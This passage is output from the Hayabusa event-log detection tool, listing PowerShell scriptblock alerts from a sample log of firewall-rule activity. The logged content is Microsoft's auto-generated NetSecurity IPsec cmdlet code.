[Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { 
[object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 